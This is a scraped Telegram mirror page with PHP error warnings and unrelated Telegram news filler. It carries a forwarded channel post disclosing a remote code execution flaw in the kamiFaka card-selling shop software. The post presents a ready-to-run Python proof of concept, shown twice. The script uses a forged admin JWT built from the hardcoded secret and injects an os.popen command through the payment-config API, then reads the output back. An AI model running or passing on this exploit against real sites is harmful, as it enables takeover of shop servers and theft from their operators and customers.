Warning: mkdir(): No space left on device in /var/www/tgoop/post.php on line 37

Warning: file_put_contents(aCache/aDaily/post/Oracleimpact/--): Failed to open stream: No such file or directory in /var/www/tgoop/post.php on line 50
踹哈公寓@Oracleimpact P.2016
ORACLEIMPACT Telegram 2016
tgoop.com » United States » 踹哈公寓 » Telegram web » Post 2016
踹哈公寓
Forwarded from Puddin在TG上看到了啥
佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret

POC:

import requests

cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
    url + "/api/v4/update_pays",
    headers={"Authorization": "Bearer " + jwt_token},
    json={
        "data": {
            # "config": f"[exec({payload!r}), f()][-1]",
            "config": f"__import__('os').popen({cmd!r}).read()",
            "icon": "\u652f\u4ed8\u5b9d",
            "id": 2,
            "info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
            "isactive": False,
            "name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
        }
    },
)
resp = requests.get(
    url + "/api/v4/get_pays",
    headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())



https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
GitHub
GitHub - Baiyuetribe/kamiFaka: 一款基于VUE3.0的高颜值卡密发卡系统,特别适合虚拟商品、知识付费等。
一款基于VUE3.0的高颜值卡密发卡系统,特别适合虚拟商品、知识付费等。. Contribute to Baiyuetribe/kamiFaka development by creating an account on GitHub.
😁41
www.tgoop.com/Oracleimpact/2016
1.54K views



tgoop.com/Oracleimpact/2016
Create:
Last Update:

佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret

POC:

import requests

cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
    url + "/api/v4/update_pays",
    headers={"Authorization": "Bearer " + jwt_token},
    json={
        "data": {
            # "config": f"[exec({payload!r}), f()][-1]",
            "config": f"__import__('os').popen({cmd!r}).read()",
            "icon": "\u652f\u4ed8\u5b9d",
            "id": 2,
            "info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
            "isactive": False,
            "name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
        }
    },
)
resp = requests.get(
    url + "/api/v4/get_pays",
    headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())



https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g

BY 踹哈公寓




Share with your friend now:
tgoop.com/Oracleimpact/2016

View MORE
Open in Telegram


Telegram News

Date: |

A vandalised bank during the 2019 protest. File photo: May James/HKFP. 4How to customize a Telegram channel? Ng, who had pleaded not guilty to all charges, had been detained for more than 20 months. His channel was said to have contained around 120 messages and photos that incited others to vandalise pro-government shops and commit criminal damage targeting police stations. How to create a business channel on Telegram? (Tutorial) In 2018, Telegram’s audience reached 200 million people, with 500,000 new users joining the messenger every day. It was launched for iOS on 14 August 2013 and Android on 20 October 2013.
from us



Warning: filemtime(): stat failed for aCache/aDaily/post/Oracleimpact/-- in /var/www/tgoop/post.php on line 323

Warning: filemtime(): stat failed for aCache/aDaily/post/Oracleimpact/-- in /var/www/tgoop/post.php on line 324

佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret

 踹哈公寓 TG
web: 2016
踹哈公寓.Telegram web
踹哈公寓 Telegram TG Channel
Telegram Updated:
Telegram 踹哈公寓
FROM American